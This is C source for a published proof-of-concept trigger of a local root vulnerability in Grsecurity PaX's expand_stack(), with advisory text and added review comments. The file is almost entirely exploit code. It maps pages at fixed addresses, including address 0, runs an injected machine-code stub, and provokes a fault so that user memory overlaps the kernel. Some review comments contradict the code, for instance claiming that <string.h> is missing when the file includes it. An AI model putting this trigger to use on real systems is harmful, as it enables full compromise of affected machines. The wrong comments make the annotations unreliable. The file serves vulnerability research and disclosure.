
/*
source: https://www.securityfocus.com/bid/22014/info
Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to obtain superuser privileges. A successful attack can result in the complete compromise of the affected computer.
NOTE: The vendor disputes the issue, stating that the application is not vulnerable.
Digital Armaments has provided an exploit and updated advisory outlining specific details of this vulnerability. Please see the reference section for further information.
*/
/*
** expand_stack() PaX local root vulnerability
** Vulnerability trigger.
**
** Copyright (C) 2007
** Digital Armaments Inc. - www.digitalarmaments.com
*/
#define _GNU_SOURCE

#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sched.h>
#include <fcntl.h>
#include <asm/page.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/wait.h>
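/*
 * Address-space constants for the trigger. The values describe an i386
 * 3G/1G split (kernel from 0xc0000000 upwards); under PaX SEGMEXEC the
 * user task is assumed to end at half that address. Both are hard-coded
 * assumptions about the target, not values read from the system.
 */
#define KBASE 0xc0000000
#define SEGMEXEC_TASK_SIZE (KBASE / 2)

/* Three pages of address space left between the two mappings; PAGE_SIZE is
 * taken from <asm/page.h>, which is a kernel header and may not be present
 * in a user-space build environment. */
#define LOSTPAGE_SIZE (PAGE_SIZE * 3)

/* Page at which main() places its first MAP_FIXED | MAP_GROWSDOWN mapping. */
#define MAP1_BASE 0x00004000

/* The two macros below are fully parenthesized so that an expression such as
 * `2 * PF_BASE` scales the whole address rather than only its first term
 * (the original expansions were unparenthesized). Neither is referenced in
 * this file. */
#define MAP2_BASE (MAP1_BASE - LOSTPAGE_SIZE)
#define PF_BASE (MAP1_BASE + SEGMEXEC_TASK_SIZE - 0x4000)

/* Not referenced in this file. */
#define PAGE_GROW_NB 10

/* Machine-code stub that main() copies to MAP1_BASE + 600 and then calls.
 * Only the first 8 bytes are initialised here (the rest are zero). Bytes
 * 1..4 are overwritten in main() with a 32-bit value computed from
 * SEGMEXEC_TASK_SIZE before the stub is executed, and the SIGBUS handler
 * mouarf() later rewrites the whole 40-byte region in place. */
static char ucode [40] = "\xbe\x00\xF0\xFF\x5F\x83\x3e\x2a";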
/*
 * SIGBUS handler installed by main() via signal(SIGBUS, mouarf).
 *
 * Rewrites the 40-byte region at MAP1_BASE + 600 (where main() placed the
 * stub it calls): every byte becomes 0x90 (x86 NOP) and byte 26 becomes 0xc3
 * (x86 RET). The intent appears to be that, once the handler returns,
 * execution resumes inside the rewritten region, slides over the NOPs and
 * returns to the call site in main() instead of re-faulting. The handler
 * does not terminate the process.
 *
 * signum: the delivered signal number; unused.
 *
 * NOTE(review): memset() is called here although <string.h> is not among
 * the file's includes, so the call depends on an implicit declaration.
 * NOTE(review): the write goes through a hard-coded address with no check
 * that the page is still mapped and writable; correctness relies on main()
 * having set the MAP1_BASE page up as PROT_READ | PROT_WRITE | PROT_EXEC
 * before the fault is delivered.
 */
void mouarf (int signum)
{
/* Same address as the memset() target; used only for the single-byte store. */
char * str = (char *) (MAP1_BASE + 600);

memset ((void *)(MAP1_BASE + 600), 0x90, 40);
str [26] = 0xc3; /* ret */
return;
}
/*
 * Entry point of the trigger.
 *
 * Sequence: install the SIGBUS handler, create two fixed anonymous mappings
 * (one page at MAP1_BASE, one page at address 0), make the MAP1_BASE page
 * executable, copy the `ucode` stub into it, call the stub (which is expected
 * to fault and be repaired by mouarf()), unmap a page between the two
 * mappings, print the PID and then sleep so the process can be inspected.
 *
 * Returns 0 after the sleep, or 1 if any mmap()/mprotect() step fails.
 * Every step depends on a specific i386 / PaX SEGMEXEC address layout
 * (see KBASE and SEGMEXEC_TASK_SIZE); none of it is portable.
 */
int main( void )
{
/* Number of pages by which the stub's target address lies below
 * SEGMEXEC_TASK_SIZE; also reported by the printf() after the call. */
int i = 1;
/* Function pointer through which the copied stub is invoked. */
void (* p)();

/* mouarf() must be in place before the stub runs, since the stub is
 * expected to raise SIGBUS. */
signal (SIGBUS, mouarf);

/* One RW page at MAP1_BASE. The fd argument is 0 rather than -1; Linux
 * ignores it for MAP_ANONYMOUS, but -1 is the documented convention. */
if( mmap( (void *) MAP1_BASE, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
{
perror( "mmap map1 base\n" );
return( 1 );
}

/* One RW page at address 0. NOTE(review): on current Linux kernels this is
 * refused for unprivileged processes by vm.mmap_min_addr; the PoC predates
 * that default, so expect this step to fail and the program to stop here. */
if( mmap( (void *) 0x0, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
{
perror( "mmap 0x0 failed\n" );
return( 1 );
}

/* The stub is executed from the MAP1_BASE page, so it must be executable.
 * Under PaX MPROTECT this call is denied unless the binary carries the
 * relaxing flag, which is what the "chpax -m" hint refers to. */
if( mprotect( (void *) MAP1_BASE, PAGE_SIZE,
PROT_READ | PROT_WRITE | PROT_EXEC ) < 0 )
{
perror( "mprotect map1 base" );
fprintf( stderr, "run chpax -m on this executable\n" );
return( 1 );
}

/* Patch the 32-bit value at ucode[1..4] with an address i pages below the
 * SEGMEXEC task boundary; this is the address the stub touches. The store
 * is an unaligned int write into a char array. */
* (int *) (ucode + 1) = (SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
/* Only 20 of the 40 bytes are copied; bytes 8..19 of ucode are zero.
 * NOTE(review): memcpy() is used without <string.h> being included. */
memcpy ((void *)(MAP1_BASE + 600), ucode, 20);
/* Arithmetic on a void pointer is a GNU extension (_GNU_SOURCE is defined). */
p = (void *) MAP1_BASE + 600;
/* NOTE(review): if PAGE_SIZE expands to an unsigned long, the argument does
 * not match %X (unsigned int) — undefined behaviour in printf(). */
printf ("--> about to fault on %X\n", SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
/* Call the stub. The expected path is: fault -> SIGBUS -> mouarf() rewrites
 * the region -> execution returns here. If no fault occurs, or the handler
 * is not reached, behaviour from this point is undefined. */
p ();
printf ("Overlaping the kernel by %d pages\n", i);

fflush( stdout );

/* Unmap the page at 0x2000, which lies between the address-0 page and the
 * MAP1_BASE page. NOTE(review): 0x2000 is passed as an int where munmap()
 * expects a void *; the original code omits the cast. */
printf ("Calling munmap ... %X, %x\n", 0x2000, 0x1000);
if (munmap (0x2000, 0x1000) < 0 )
perror ("munmap");

/* Alternative follow-up step left disabled by the author. */
// printf ("Calling mremap ... \n");
// if (mremap (0x2000, 0x1000, 0x10000, MREMAP_MAYMOVE) < 0 )
// perror ("mremap");

/* Keep the process alive for a long time; printing the PID suggests the
 * resulting address space is meant to be examined from another shell. */
printf ("PID:%d, sleeping\n", getpid ());
sleep (2000);
return( 0 );
}